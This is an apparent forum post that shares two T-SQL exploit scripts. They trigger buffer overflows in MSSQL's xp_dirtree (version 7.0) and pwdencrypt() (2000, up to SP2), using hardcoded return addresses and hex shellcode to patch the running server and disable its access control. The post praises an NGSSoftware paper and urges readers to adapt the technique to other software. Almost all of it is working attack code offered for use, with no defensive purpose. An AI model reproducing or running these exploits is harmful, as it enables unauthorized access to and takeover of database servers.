Hi, all your folks read the "Violating Database - Enforced Security
Mechanisms" article from NGSSoftware. This is wonderful. Althoungh they just show case study with MSSQL 2k but you guys easily follow their instructions to exploit other applications. In my case, MSSQL 7.0
| CODE |
/*
Exploit code used xp_dirtree buffer overflow to "runtime patch"
to disable access control in MSSQL 7.0
$$$<sorite2003@yahoo.co.uk>
*/
declare @e nvarchar(400)
declare @sra nvarchar(8)
declare @m nvarchar(2)
declare @p nvarchar(400)
-- Win2k service pack 2
--0x77E2492B
select @sra = 0x2B49E277
select @m = 0xEBF8
select @p=0x6681ec000190b96a015f66ba0fbf4002b8000140003d00016000742c4039107402ebf239480
47402ebeb8bd8546a406a0850b8eca6e877ffd08bc3c7006a015890c740046a015f6631c0ffd0EBB
2
select @e=replicate('A',221)+@p+@sra+@m
exec master..xp_dirtree @e
/*
Exploit code used pwdencrypt() buffer overflow to "runtime patch"
to disable access control in MSSQL 2k no sp,sp1,sp2
$$$<sorite2003@yahoo.co.uk>
*/
declare @exploit nvarchar(2000)
declare @padding nvarchar(200)
declare @exploit_code nvarchar(1000)
declare @sra nvarchar(8)
declare @short_jump nvarchar(8)
-- Win2k service pack 2
--0x77E2492B
select @sra = 0x2B49E277
select @short_jump = 0xEB0A9090
select @padding = replicate(N'C',166)
select @exploit_code = 0x6000600060006000b940025ec3ba4048668bb8000040003d00006000742c4039107402ebf23948
047402ebeb8bd8546a406a0850b8eca6e877ffd08bc3c700404866b8c7400401005ec331c0ffd0
select @exploit = @padding+@sra+@short_jump+@exploit_code
select pwdencrypt(@exploit)
|
